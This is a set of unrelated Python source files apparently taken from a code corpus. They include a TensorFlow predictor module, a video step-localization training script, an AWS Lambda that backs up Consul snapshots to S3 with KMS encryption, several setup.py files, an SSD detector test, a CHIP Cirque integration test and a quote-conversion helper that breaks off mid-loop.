import six
from ..tfutils.common import get_tensors_by_names
from ..tfutils.tower import PredictTowerContext
from ..input_source import PlaceholderInput
__all__ = ['PredictorBase', 'AsyncPredictorBase',
'OnlinePredictor', 'OfflinePredictor',
]
@six.add_metaclass(ABCMeta)
class PredictorBase(object):
"""
Base class for all predictors.
Attributes:
return_input (bool): whether the call will also return (inputs, outputs)
or just outputs
"""
def __call__(self, *dp):
"""
Call the predictor on some inputs.
Example:
When you have a predictor defined with two inputs, call it with:
.. code-block:: python
predictor(e1, e2)
"""
output = self._do_call(dp)
if self.return_input:
return (dp, output)
else:
return output
@abstractmethod
def _do_call(self, dp):
"""
Args:
dp: input datapoint. must have the same length as input_names
Returns:
output as defined by the config
"""
class AsyncPredictorBase(PredictorBase):
""" Base class for all async predictors. """
@abstractmethod
def put_task(self, dp, callback=None):
"""
Args:
dp (list): A datapoint as inputs. It could be either batched or not
batched depending on the predictor implementation).
callback: a thread-safe callback to get called with
either outputs or (inputs, outputs).
Returns:
concurrent.futures.Future: a Future of results
"""
@abstractmethod
def start(self):
""" Start workers """
def _do_call(self, dp):
assert six.PY3, "With Python2, sync methods not available for async predictor"
fut = self.put_task(dp)
# in Tornado, Future.result() doesn't wait
return fut.result()
class OnlinePredictor(PredictorBase):
""" A predictor which directly use an existing session and given tensors.
"""
ACCEPT_OPTIONS = False
""" See Session.make_callable """
sess = None
"""
The tf.Session object associated with this predictor.
"""
def __init__(self, input_tensors, output_tensors,
return_input=False, sess=None):
"""
Args:
input_tensors (list): list of names.
output_tensors (list): list of names.
return_input (bool): same as :attr:`PredictorBase.return_input`.
sess (tf.Session): the session this predictor runs in. If None,
will use the default session at the first call.
Note that in TensorFlow, default session is thread-local.
"""
self.return_input = return_input
self.input_tensors = input_tensors
self.output_tensors = output_tensors
self.sess = sess
if sess is not None:
self._callable = sess.make_callable(
fetches=output_tensors,
feed_list=input_tensors,
accept_options=self.ACCEPT_OPTIONS)
else:
self._callable = None
def _do_call(self, dp):
assert len(dp) == len(self.input_tensors), \
"{} != {}".format(len(dp), len(self.input_tensors))
if self.sess is None:
self.sess = tf.get_default_session()
assert self.sess is not None, "Predictor isn't called under a default session!"
if self._callable is None:
self._callable = self.sess.make_callable(
fetches=self.output_tensors,
feed_list=self.input_tensors,
accept_options=self.ACCEPT_OPTIONS)
# run_metadata = tf.RunMetadata()
# options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
return self._callable(*dp)
class OfflinePredictor(OnlinePredictor):
""" A predictor built from a given config.
A single-tower model will be built without any prefix. """
def __init__(self, config):
"""
Args:
config (PredictConfig): the config to use.
"""
self.graph = config._maybe_create_graph()
with self.graph.as_default():
input = PlaceholderInput()
input.setup(config.inputs_desc)
with PredictTowerContext(''):
config.tower_func(*input.get_input_tensors())
input_tensors = get_tensors_by_names(config.input_names)
output_tensors = get_tensors_by_names(config.output_names)
all_saver = tf.train.Saver() # Create the Saver object to save the Checkpoints
config.session_init._setup_graph()
sess = config.session_creator.create_session()
config.session_init._run_init(sess)
all_saver.save(sess, 'SE-ResNet50-ckpt/se-resnet50.ckpt') # Save the Checkpoints in the SENet-ckpt folder
writer = tf.summary.FileWriter('./tensorboard', self.graph) # Output the Tensorboard in the tensorboard folder
writer.close()
super(OfflinePredictor, self).__init__(
input_tensors, output_tensors, config.return_input, sess)
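# Usage sketch (assumptions, not taken from this file: `my_model` is a ModelDesc-style
# object accepted by PredictConfig, and the checkpoint path is a placeholder):
#
#     pred_config = PredictConfig(
#         model=my_model,
#         session_init=SaverRestore('/path/to/model.ckpt'),
#         input_names=['input'],
#         output_names=['prob'])
#     predictor = OfflinePredictor(pred_config)
#     prob = predictor(image_batch)[0]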
|
the-stack_0_6167 | from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from __future__ import print_function
from model import Model
from data import *
from args import parse_args
from dp import dp
import torch as th
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
import pickle
#th.cuda.set_device(1)
class Loss(nn.Module):
def __init__(self, lambd):
super(Loss, self).__init__()
self.lambd = lambd
self.lsm = nn.LogSoftmax(dim=1)
def forward(self, O, Y, C):
return (Y*(self.lambd * C - self.lsm(O))).mean(dim=0).sum()
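        # i.e. a cross-entropy-style term -Y*log_softmax(O) plus a constraint penalty
        # lambd*Y*C, averaged over frames (dim 0) and summed over the K steps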
def uniform_assignment(T,K):
stepsize = float(T) / K
y = th.zeros(T,K)
for k in range(K):
t = round(stepsize*(k+0.5))
y[t,k] = 1
return y
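    # e.g. uniform_assignment(5, 2) assigns step 0 to frame 1 and step 1 to frame 4,
    # i.e. y == [[0, 0], [1, 0], [0, 0], [0, 0], [0, 1]]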
def get_recalls(Y_true, Y_pred):
step_match = {task: 0 for task in Y_true.keys()}
step_total = {task: 0 for task in Y_true.keys()}
for task,ys_true in Y_true.items():
ys_pred = Y_pred[task]
for vid in set(ys_pred.keys()).intersection(set(ys_true.keys())):
y_true = ys_true[vid]
y_pred = ys_pred[vid]
step_total[task] += (y_true.sum(axis=0)>0).sum()
step_match[task] += (y_true*y_pred).sum()
recalls = {task: step_match[task] / n for task,n in step_total.items()}
return recalls
args = parse_args()
task_vids = get_vids(args.video_csv_path)
val_vids = get_vids(args.val_csv_path)
task_vids = {task: [vid for vid in vids if task not in val_vids or vid not in val_vids[task]] for task,vids in task_vids.items()}
primary_info = read_task_info(args.primary_path)
test_tasks = set(primary_info['steps'].keys())
if args.use_related:
related_info = read_task_info(args.related_path)
task_steps = {**primary_info['steps'], **related_info['steps']}
n_steps = {**primary_info['n_steps'], **related_info['n_steps']}
else:
task_steps = primary_info['steps']
n_steps = primary_info['n_steps']
all_tasks = set(n_steps.keys())
task_vids = {task: vids for task,vids in task_vids.items() if task in all_tasks}
A, M = get_A(task_steps, share=args.share)
if args.use_gpu:
A = {task: a.cuda() for task, a in A.items()}
train_vids, test_vids = random_split(task_vids, test_tasks, args.n_train)
trainset = CrossTaskDataset(train_vids, n_steps, args.features_path, args.constraints_path)
trainloader = DataLoader(trainset,
batch_size = args.batch_size,
num_workers = args.num_workers,
shuffle = True,
drop_last = True,
collate_fn = lambda batch: batch,
)
testset = CrossTaskDataset(test_vids, n_steps, args.features_path, args.constraints_path)
testloader = DataLoader(testset,
batch_size = args.batch_size,
num_workers = args.num_workers,
shuffle = False,
drop_last = False,
collate_fn = lambda batch: batch,
)
# import pdb; pdb.set_trace()  # optional debugging breakpoint
net = Model(args.d, M, A, args.q).cuda() if args.use_gpu else Model(args.d, M, A, args.q)
optimizer = optim.Adam(net.parameters(), lr=args.lr)
loss_fn = Loss(args.lambd)
# initialize with uniform step assignment
Y = {}
for batch in trainloader:
for sample in batch:
task = sample['task']
vid = sample['vid']
K = n_steps[task]
T = sample['X'].shape[0]
if task not in Y:
Y[task] = {}
y = uniform_assignment(T,K)
Y[task][vid] = y.cuda() if args.use_gpu else y
def save_stuff(Y_pred, Y_true, outputs):
pickle.dump(Y_pred, open('Y_pred.pkl', 'wb'), protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(Y_true, open('Y_true.pkl', 'wb'), protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(outputs, open('outputs.pkl', 'wb'), protocol=pickle.HIGHEST_PROTOCOL)
def train_epoch(pretrain=False):
cumloss = 0.
for batch in trainloader:
for sample in batch:
vid = sample['vid']
task = sample['task']
X = sample['X'].cuda() if args.use_gpu else sample['X']
C = sample['C'].cuda() if args.use_gpu else sample['C']
if pretrain:
# picking random assignment, that satisfies the constraints
O = np.random.rand(X.size()[0],n_steps[task]) + C.cpu().numpy()
y = np.zeros(Y[task][vid].shape,dtype=np.float32)
dp(y,O.astype(np.float32),exactly_one=True)
Y[task][vid].data = th.tensor(y,dtype=th.float).cuda() if args.use_gpu else th.tensor(y,dtype=th.float)
else:
# updating assignment
O = net(X, task)
# y = th.tensor(Y[task][vid].data,requires_grad=True)
y = Y[task][vid].requires_grad_(True)
loss = loss_fn(O, y, C)
param_grads = th.autograd.grad(loss, net.parameters(), create_graph=True, only_inputs=True)
F = loss
for g in param_grads:
F -= 0.5*args.lr*(g**2).sum()
Y_grad = th.autograd.grad(F,[y], only_inputs=True)
y = np.zeros(Y[task][vid].size(),dtype=np.float32)
dp(y,Y_grad[0].cpu().numpy())
Y[task][vid].requires_grad_(False)
Y[task][vid].data = th.tensor(y,dtype=th.float).cuda() if args.use_gpu else th.tensor(y,dtype=th.float)
# updating model parameters
O = net(X, task)
loss = loss_fn(O,Y[task][vid],C)
loss.backward()
cumloss += loss.item()
optimizer.step()
net.zero_grad()
return cumloss
def eval():
net.eval()
lsm = nn.LogSoftmax(dim=1)
Y_pred = {}
Y_true = {}
outputs = {}
for batch in testloader:
for sample in batch:
vid = sample['vid']
task = sample['task']
X = sample['X'].cuda() if args.use_gpu else sample['X']
O = lsm(net(X, task))
if task not in outputs:
outputs[task] = {}
outputs[task][vid] = O.detach().cpu().numpy()
y = np.zeros(O.size(),dtype=np.float32)
dp(y,-O.detach().cpu().numpy())
if task not in Y_pred:
Y_pred[task] = {}
Y_pred[task][vid] = y
annot_path = os.path.join(args.annotation_path,task+'_'+vid+'.csv')
if os.path.exists(annot_path):
if task not in Y_true:
Y_true[task] = {}
Y_true[task][vid] = read_assignment(*y.shape, annot_path)
recalls = get_recalls(Y_true, Y_pred)
for task,rec in recalls.items():
print('Task {0}. Recall = {1:0.3f}'.format(task, rec))
avg_recall = np.mean(list(recalls.values()))
print ('Recall: {0:0.3f}'.format(avg_recall))
save_stuff(Y_pred, Y_true, outputs)
net.train()
if args.model_load_path:
print ('Loading...')
net.load_state_dict(th.load(args.model_load_path))
else:
print ('Training...')
net.train()
for epoch in range(args.pretrain_epochs):
cumloss = train_epoch(pretrain=True)
print ('Epoch {0}. Loss={1:0.2f}'.format(epoch+1, cumloss))
for epoch in range(args.epochs):
cumloss = train_epoch()
print ('Epoch {0}. Loss={1:0.2f}'.format(args.pretrain_epochs+epoch+1, cumloss))
if args.model_save_path:
th.save(net.state_dict(), args.model_save_path)
print ('Evaluating...')
eval()
|
the-stack_0_6168 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import itertools
import json
import os
import shutil
import ssl
from datetime import datetime
from urllib.error import HTTPError
from urllib.request import Request, urlopen
import boto3
from botocore.exceptions import NoCredentialsError
FULL_PATH = "/tmp/"
CHUNK_NAME_PREFIX = "snapshot_chunk_"
CHUNK_SIZE = 4000
def split_chunks(file_name, key, encryption_context=None):
    """
    :param file_name: (str) File name to split
    :param key: (str) KMS key id used to encrypt each chunk
    :param encryption_context: (dict, optional) encryption context passed to KMS
    :return: (str) Name of the chunk directory (today's date, YYYYMMDD)
    """
    if encryption_context is None:
        encryption_context = {}
    chunk_dir = datetime.now().strftime("%Y%m%d")
if os.path.isdir(FULL_PATH + chunk_dir):
shutil.rmtree(FULL_PATH + chunk_dir)
os.mkdir(FULL_PATH + chunk_dir)
client = boto3.client("kms")
with open(FULL_PATH + file_name, 'rb') as infile:
for i in itertools.count(0):
chunk = infile.read(CHUNK_SIZE)
if not chunk: break
chunk_name = CHUNK_NAME_PREFIX + str(i)
response = client.encrypt(
KeyId=key,
Plaintext=chunk,
EncryptionContext=encryption_context
)
with open(FULL_PATH + chunk_dir + "/" + chunk_name, 'wb') as outfile:
outfile.write(response["CiphertextBlob"])
return chunk_dir
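# e.g. split_chunks("snapshot_20210101", "alias/backup-key", {"purpose": "consul-backup"})
# encrypts the file in 4000-byte chunks and returns today's date string (YYYYMMDD) as the
# chunk directory name; the key alias and context values here are placeholders.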
def get_token(bucket, path, encryption_context=None):
    """
    :param bucket: (str) Configuration Bucket
    :param path: (str) Path to encrypted configuration file
    :param encryption_context: (dict, optional) encryption context passed to KMS
    :return: (dict) Decrypted configuration containing the Consul token
    """
    if encryption_context is None:
        encryption_context = {}
    client = boto3.resource("s3")
client.Bucket(bucket).download_file(path, FULL_PATH + 'secrets.enc')
client = boto3.client("kms")
with open(FULL_PATH + "secrets.enc", "rb") as file:
response = client.decrypt(CiphertextBlob=file.read(),
EncryptionContext=encryption_context
)
return json.loads(response["Plaintext"])
def generate_file_name(prefix="snapshot"):
"""
Generates file name bases
:param prefix: (str) Value to prefix the filename. Defaults to snapshot
:return: (str) File name with the pattern 'prefix_YYYYmmdd'
"""
now = datetime.now()
return prefix + "_" + now.strftime("%Y%m%d")
def download_snapshot(url, headers={}):
"""
:param url: (str) Url to query
:param headers: (dict) Headers to add to query
    :return: (str) Name of the downloaded snapshot file; raises Exception("Backup Failed.")
        if the download or the local write fails
"""
ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
request = Request(url)
for key in headers:
request.add_header(key, headers[key])
file_name = generate_file_name()
# Download the file from `url` and save it locally under `file_name`:
try:
        with urlopen(request, context=ssl_context) as response, \
                open(os.path.join(FULL_PATH, file_name), 'wb') as out_file:
data = response.read()
out_file.write(data)
except HTTPError as error:
print("Snapshot Failed: " + error.reason)
raise Exception("Backup Failed.")
except PermissionError as error:
print("Snapshot Failed: Write " + error.strerror)
raise Exception("Backup Failed.")
return file_name
def upload_chunks(chunk_dir, bucket_path, bucket):
"""
    :param chunk_dir: (str) Directory under /tmp/ that holds the encrypted chunks
    :param bucket_path: (str) Key prefix inside the destination bucket
    :param bucket: (str) Destination S3 Bucket
    :return: (dict) Response of the last put_object call
"""
client = boto3.client("s3")
try:
chunks = os.listdir(FULL_PATH + chunk_dir)
for chunk in chunks:
data = open(FULL_PATH + chunk_dir + "/" + chunk, 'rb')
response = client.put_object(Key=bucket_path + "/" + chunk_dir + "/" + chunk, Body=data, Bucket=bucket)
except NoCredentialsError:
print("Upload error: Authentication failed")
raise Exception("Backup Failed.")
except FileNotFoundError as error:
print("Upload error: " + error.strerror)
raise Exception("Backup Failed.")
return response
def aws_lambda_handler(*args, **kwargs):
"""
Main handler for AWS
"""
config_bucket = os.getenv("CONFIG_BUCKET")
config_path = os.getenv("CONFIG_PATH")
backup_bucket = os.getenv("BACKUP_BUCKET")
backup_path = os.getenv("BACKUP_PATH")
url = os.getenv("URL")
key = os.getenv("KEY")
print("Start execution")
config = get_token(config_bucket, config_path)
headers = {"X-Consul-Token": config["token"]}
print("Download Snapshot")
file_name = download_snapshot(url, headers)
chunk_dir = split_chunks(file_name, key)
print("Upload chunks to s3")
upload_chunks(chunk_dir, backup_path, backup_bucket)
print("Execution Successful")
#
# For Local Testing
#
def main():
    # Local smoke test: the snapshot file name and KMS key alias below are placeholders.
    split_chunks(generate_file_name(), "alias/example-key")
if __name__ == '__main__':
main()
|
the-stack_0_6170 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author : Masahiro Ohmomo
# DCC : Maya
# Version : 2013 - Latest
# Recommend: 2013
#
# Description.
# In this script, you can toggle the visibility of objects .
#
# Run command.
# import toggle_visibility
# toggle_visibility.main()
#
from maya import cmds
def main():
selected = cmds.ls(sl=True)
if selected:
for sel in selected:
b_v = False if cmds.getAttr('%s.v'%sel) else True
cmds.setAttr('%s.v'%sel, b_v) |
the-stack_0_6171 | # encoding: utf-8
from setuptools import setup, find_packages
import os, re, ast
# parse version from locust/__init__.py
_version_re = re.compile(r'__version__\s+=\s+(.*)')
_init_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), "locust", "__init__.py")
with open(_init_file, 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name='locustio',
version=version,
description="Website load testing framework",
long_description="""Locust is a python utility for doing easy, distributed load testing of a web site""",
classifiers=[
"Topic :: Software Development :: Testing :: Traffic Generation",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
],
keywords='',
author='Jonatan Heyman, Carl Bystrom, Joakim Hamrén, Hugo Heyman',
author_email='',
url='http://locust.io',
license='MIT',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=["gevent>=1.2.2", "flask>=0.10.1", "requests>=2.9.1", "msgpack-python>=0.4.2", "six>=1.10.0", "pyzmq==15.2.0"],
tests_require=['unittest2', 'mock'],
entry_points={
'console_scripts': [
'locust = locust.main:main',
]
},
)
|
the-stack_0_6172 | from setuptools import setup, find_packages
with open("README.rst", "r") as fh:
long_description = fh.read()
# Get the version.
version = {}
with open("pastas/version.py") as fp:
exec(fp.read(), version)
setup(
name='pastas',
version=version['__version__'],
description='Python package to perform time series analysis of '
'hydrological time series.',
long_description=long_description,
long_description_content_type="text/x-rst",
url='https://github.com/pastas/pastas',
author='R.A. Collenteur, M. Bakker, R. Calje, F. Schaars',
author_email='[email protected], [email protected], '
'[email protected]',
project_urls={
'Source': 'https://github.com/pastas/pastas',
'Documentation': 'http://pastas.readthedocs.io/en/latest/',
'Tracker': 'https://github.com/pastas/pastas/issues',
'Help': 'https://stackoverflow.com/questions/tagged/pastas'
},
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'Intended Audience :: Other Audience',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Scientific/Engineering :: Hydrology',
],
platforms='Windows, Mac OS-X',
install_requires=['numpy>=1.15',
'matplotlib>=2.0',
'pandas>=0.25',
'scipy>=1.1'],
packages=find_packages(exclude=[]),
)
|
the-stack_0_6174 | import codecs
import os
import re
from setuptools import find_packages, setup
###############################################################################
NAME = "attrs"
PACKAGES = find_packages(where="src")
META_PATH = os.path.join("src", "attr", "__init__.py")
KEYWORDS = ["class", "attribute", "boilerplate"]
PROJECT_URLS = {
"Documentation": "https://www.attrs.org/",
"Bug Tracker": "https://github.com/python-attrs/attrs/issues",
"Source Code": "https://github.com/python-attrs/attrs",
}
CLASSIFIERS = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
]
INSTALL_REQUIRES = []
EXTRAS_REQUIRE = {
"docs": ["sphinx", "zope.interface"],
"tests": [
"coverage",
"hypothesis",
"pympler",
"pytest>=4.3.0", # 4.3.0 dropped last use of `convert`
"six",
"zope.interface",
],
}
EXTRAS_REQUIRE["dev"] = (
EXTRAS_REQUIRE["tests"] + EXTRAS_REQUIRE["docs"] + ["pre-commit"]
)
EXTRAS_REQUIRE["azure-pipelines"] = EXTRAS_REQUIRE["tests"] + [
"pytest-azurepipelines"
]
###############################################################################
HERE = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
"""
    Build an absolute path from *parts* and return the contents of the
resulting file. Assume UTF-8 encoding.
"""
with codecs.open(os.path.join(HERE, *parts), "rb", "utf-8") as f:
return f.read()
META_FILE = read(META_PATH)
def find_meta(meta):
"""
Extract __*meta*__ from META_FILE.
"""
meta_match = re.search(
r"^__{meta}__ = ['\"]([^'\"]*)['\"]".format(meta=meta), META_FILE, re.M
)
if meta_match:
return meta_match.group(1)
raise RuntimeError("Unable to find __{meta}__ string.".format(meta=meta))
VERSION = find_meta("version")
URL = find_meta("url")
LONG = (
read("README.rst")
+ "\n\n"
+ "Release Information\n"
+ "===================\n\n"
+ re.search(
r"(\d+.\d.\d \(.*?\)\r?\n.*?)\r?\n\r?\n\r?\n----\r?\n\r?\n\r?\n",
read("CHANGELOG.rst"),
re.S,
).group(1)
+ "\n\n`Full changelog "
+ "<{url}en/stable/changelog.html>`_.\n\n".format(url=URL)
+ read("AUTHORS.rst")
)
if __name__ == "__main__":
setup(
name=NAME,
description=find_meta("description"),
license=find_meta("license"),
url=URL,
project_urls=PROJECT_URLS,
version=VERSION,
author=find_meta("author"),
author_email=find_meta("email"),
maintainer=find_meta("author"),
maintainer_email=find_meta("email"),
keywords=KEYWORDS,
long_description=LONG,
long_description_content_type="text/x-rst",
packages=PACKAGES,
package_dir={"": "src"},
python_requires=">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*",
zip_safe=False,
classifiers=CLASSIFIERS,
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
include_package_data=True,
)
|
the-stack_0_6175 | from __future__ import print_function
import sys
import os
import argparse
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torchvision.transforms as transforms
from torch.autograd import Variable
from data import VOC_ROOT, VOC_CLASSES as labelmap
from PIL import Image
from data import VOCAnnotationTransform, VOCDetection, BaseTransform, VOC_CLASSES
import torch.utils.data as data
from ssd import build_ssd
parser = argparse.ArgumentParser(description='Single Shot MultiBox Detection')
parser.add_argument('--trained_model', default='weights/ssd_300_VOC0712.pth',
type=str, help='Trained state_dict file path to open')
parser.add_argument('--save_folder', default='eval/', type=str,
help='Dir to save results')
parser.add_argument('--visual_threshold', default=0.6, type=float,
help='Final confidence threshold')
parser.add_argument('--cuda', default=True, type=bool,
help='Use cuda to train model')
parser.add_argument('--voc_root', default=VOC_ROOT, help='Location of VOC root directory')
parser.add_argument('-f', default=None, type=str, help="Dummy arg so we can load in Jupyter Notebooks")
args = parser.parse_args()
if args.cuda and torch.cuda.is_available():
torch.set_default_tensor_type('torch.cuda.FloatTensor')
else:
torch.set_default_tensor_type('torch.FloatTensor')
if not os.path.exists(args.save_folder):
os.mkdir(args.save_folder)
def test_net(save_folder, net, cuda, testset, transform, thresh):
# dump predictions and assoc. ground truth to text file for now
filename = save_folder+'test1.txt'
num_images = len(testset)
for i in range(num_images):
print('Testing image {:d}/{:d}....'.format(i+1, num_images))
img = testset.pull_image(i)
img_id, annotation = testset.pull_anno(i)
x = torch.from_numpy(transform(img)[0]).permute(2, 0, 1)
x = Variable(x.unsqueeze(0))
with open(filename, mode='a') as f:
f.write('\nGROUND TRUTH FOR: '+img_id+'\n')
for box in annotation:
f.write('label: '+' || '.join(str(b) for b in box)+'\n')
if cuda:
x = x.cuda()
y = net(x) # forward pass
detections = y.data
# scale each detection back up to the image
scale = torch.Tensor([img.shape[1], img.shape[0],
img.shape[1], img.shape[0]])
pred_num = 0
for i in range(detections.size(1)):
j = 0
            while detections[0, i, j, 0] >= thresh:
if pred_num == 0:
with open(filename, mode='a') as f:
f.write('PREDICTIONS: '+'\n')
score = detections[0, i, j, 0]
label_name = labelmap[i-1]
pt = (detections[0, i, j, 1:]*scale).cpu().numpy()
coords = (pt[0], pt[1], pt[2], pt[3])
pred_num += 1
with open(filename, mode='a') as f:
f.write(str(pred_num)+' label: '+label_name+' score: ' +
str(score) + ' '+' || '.join(str(c) for c in coords) + '\n')
j += 1
def test_voc():
# load net
num_classes = len(VOC_CLASSES) + 1 # +1 background
if "cityscapes" in args.trained_model or "sim10k" in args.trained_model:
num_classes = 201
# VOC_CLASSES = ("car")
net = build_ssd('test', 300, num_classes) # initialize SSD
net.load_state_dict(torch.load(args.trained_model))
net.eval()
print('Finished loading model!')
# load data
testset = VOCDetection(args.voc_root, [('2007', 'test')], None, VOCAnnotationTransform())
if args.cuda:
net = net.cuda()
cudnn.benchmark = True
# evaluation
test_net(args.save_folder, net, args.cuda, testset,
BaseTransform(net.size, (104, 117, 123)),
thresh=args.visual_threshold)
if __name__ == '__main__':
test_voc()
|
the-stack_0_6178 | #!/usr/bin/env python3
"""
Copyright (c) 2021 Project CHIP Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import os
import pprint
import time
import sys
from helper.CHIPTestBase import CHIPVirtualHome
logger = logging.getLogger('MobileDeviceTest')
logger.setLevel(logging.INFO)
sh = logging.StreamHandler()
sh.setFormatter(
logging.Formatter(
'%(asctime)s [%(name)s] %(levelname)s %(message)s'))
logger.addHandler(sh)
CHIP_PORT = 5540
CIRQUE_URL = "http://localhost:5000"
CHIP_REPO = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "..", "..")
TEST_EXTPANID = "fedcba9876543210"
DEVICE_CONFIG = {
'device0': {
'type': 'MobileDevice',
'base_image': 'connectedhomeip/chip-cirque-device-base',
'capability': ['Interactive', 'TrafficControl', 'Mount'],
'rcp_mode': True,
'docker_network': 'Ipv6',
'traffic_control': {'latencyMs': 100},
"mount_pairs": [[CHIP_REPO, CHIP_REPO]],
},
'device1': {
'type': 'CHIPEndDevice',
'base_image': 'connectedhomeip/chip-cirque-device-base',
'capability': ['Thread', 'Interactive', 'TrafficControl', 'Mount'],
'rcp_mode': True,
'docker_network': 'Ipv6',
'traffic_control': {'latencyMs': 100},
"mount_pairs": [[CHIP_REPO, CHIP_REPO]],
}
}
class TestPythonController(CHIPVirtualHome):
def __init__(self, device_config):
super().__init__(CIRQUE_URL, device_config)
self.logger = logger
def setup(self):
self.initialize_home()
def test_routine(self):
self.run_controller_test()
def run_controller_test(self):
ethernet_ip = [device['description']['ipv6_addr'] for device in self.non_ap_devices
if device['type'] == 'CHIPEndDevice'][0]
server_ids = [device['id'] for device in self.non_ap_devices
if device['type'] == 'CHIPEndDevice']
req_ids = [device['id'] for device in self.non_ap_devices
if device['type'] == 'MobileDevice']
for server in server_ids:
self.execute_device_cmd(server, "CHIPCirqueDaemon.py -- run {} --thread".format(
os.path.join(CHIP_REPO, "out/debug/standalone/chip-lighting-app")))
self.reset_thread_devices(server_ids)
req_device_id = req_ids[0]
self.execute_device_cmd(req_device_id, "pip3 install {}".format(os.path.join(
CHIP_REPO, "out/debug/linux_x64_gcc/controller/python/chip-0.0-cp37-abi3-linux_x86_64.whl")))
command = "gdb -return-child-result -q -ex run -ex bt --args python3 {} -t 75 -a {}".format(
os.path.join(
CHIP_REPO, "src/controller/python/test/test_scripts/mobile-device-test.py"),
ethernet_ip)
ret = self.execute_device_cmd(req_device_id, command)
self.assertEqual(ret['return_code'], '0',
"Test failed: non-zero return code")
# Check if the device is in thread network.
self.check_device_thread_state(
server_ids[0], expected_role=['leader'], timeout=5)
# Check if the device is attached to the correct thread network.
for device_id in server_ids:
reply = self.execute_device_cmd(device_id, 'ot-ctl extpanid')
self.assertEqual(reply['output'].split()[0].strip(), TEST_EXTPANID)
# Check if device can be controlled by controller
for device_id in server_ids:
self.logger.info("checking device log for {}".format(
self.get_device_pretty_id(device_id)))
self.assertTrue(self.sequenceMatch(self.get_device_log(device_id).decode('utf-8'), ["LightingManager::InitiateAction(ON_ACTION)", "LightingManager::InitiateAction(OFF_ACTION)", "No Cluster 0x0000_0006 on Endpoint 0xe9"]),
"Datamodel test failed: cannot find matching string from device {}".format(device_id))
if __name__ == "__main__":
sys.exit(TestPythonController(DEVICE_CONFIG).run_test())
|
the-stack_0_6180 | import re
from pathlib import Path
# Local modules
try:
from .checker import checker
except ImportError:
from checker import checker
try:
from .helpers import checkBrackets
except ImportError:
from helpers import checkBrackets
###################### REGULAR EXPRESSIONS ######################
skip_a_line = re.compile(r".*") # Skipping a line (upto the newline character)
multiline_comments = re.compile(
r"""('''|\"\"\")
(.*?) # Any number of lines between the comments including newline characters
('''|\"\"\")""",
re.DOTALL | re.VERBOSE,
)
# Regex checking for a whole print statement
print_checker = re.compile(r"([ \t]*print)(\(.*\))([ \t]*)", re.DOTALL)
comments = re.compile(r"[ \t]*(#|'''|\"\"\")")
hash_comments = re.compile(r"[ \t]*#")
# To check if multiline comments start from here
multiline_comments_start_spc = re.compile(r"[ \t]*('''|\"\"\")")
# For checking a whole multiline comment
multiline_comments_spc = re.compile(r"[ \t]*('''.*'''|\"\"\".*\"\"\")[ \t]*", re.DOTALL)
blank_line = re.compile(r"^[ \t]*$")
re_indentation = re.compile(r"([ \t]+)(.)")
#################################################################
def convert_quotes_slave(filepath: Path, single: bool = True) -> tuple:
    """
    Helper function to convert the quotes in a file
    Args:
        filepath: A path object pointing to the file to convert
        single: True to convert quotes to single quotes, False to convert them to double quotes
    Returns:
        A (success, filepath) tuple; success is True if the file was converted to the
        desired quotes without any syntactical errors
"""
# Opening the file and checking for any syntactical errors
try:
with open(filepath, "r", encoding="utf-8") as file:
data = file.read()
if not checker(data, False):
return (False, filepath)
except UnicodeDecodeError:
return (False, filepath)
# Desired quotes in the file
dest = "'" if single else '"'
new_file_content = ""
quotes = ('"', "'")
i = 0
while i < len(data):
# If a hashed comment occurs, no need to check the comment string for quotes
if data[i] == "#":
hashed_comment = re.match(skip_a_line, data[i:])
new_file_content += data[i : i + hashed_comment.span()[1]]
# Skip the characters in the comment upto newline
i = i + hashed_comment.span()[1]
# Main condition: If a quote is encountered
elif data[i] in quotes:
# Check if it is a docstring
matched_comments = re.match(multiline_comments, data[i:])
if matched_comments:
# Replacing the docstring quotes with the desired quotes
new_file_content += dest * 3 + matched_comments.group(2) + dest * 3
i += matched_comments.span()[1] # Skip the docstring
else:
ends = data[i] # Start of the string
new_file_content += dest # Replace the quote with the desired quote
i += 1
# Go upto the end of string
while data[i] != ends:
